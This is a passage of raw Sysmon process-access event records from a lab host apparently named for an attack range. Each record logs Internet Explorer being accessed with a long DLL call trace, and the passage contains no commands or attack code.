Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f8f(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f58(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+135b29(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+13603d(wow64) 10341000x800000000000000013549Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64) 10341000x800000000000000013548Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.350{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5f23(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5a78(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59c6(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64) 10341000x800000000000000013547Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c6173(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5650(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+204f32(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5314(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64) 10341000x800000000000000013546Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c6173(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5650(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+204f32(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5314(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64) 10341000x800000000000000013545Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c6173(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5650(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+204f32(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5314(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64) 10341000x800000000000000013544Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\SHELL32.dll+192845(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c6173(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5650(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+204f32(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5314(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64) 10341000x800000000000000013543Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+1928d9(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5650(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+204f32(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5314(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64) 10341000x800000000000000013542Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\SHELL32.dll+19285a(wow64)|C:\Windows\System32\SHELL32.dll+1923ec(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c60b7(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5650(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+204f32(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c5314(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+c59a4(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114d8a(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+114b56(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+113bba(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc746(wow64)|C:\Windows\SYSTEM32\IEFRAME.dll+bc58c(wow64) 10341000x800000000000000013541Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:03.304{59A5CD1D-9410-6005-0E05-00000000A301}65846724C:\Program Files (x86)\Internet 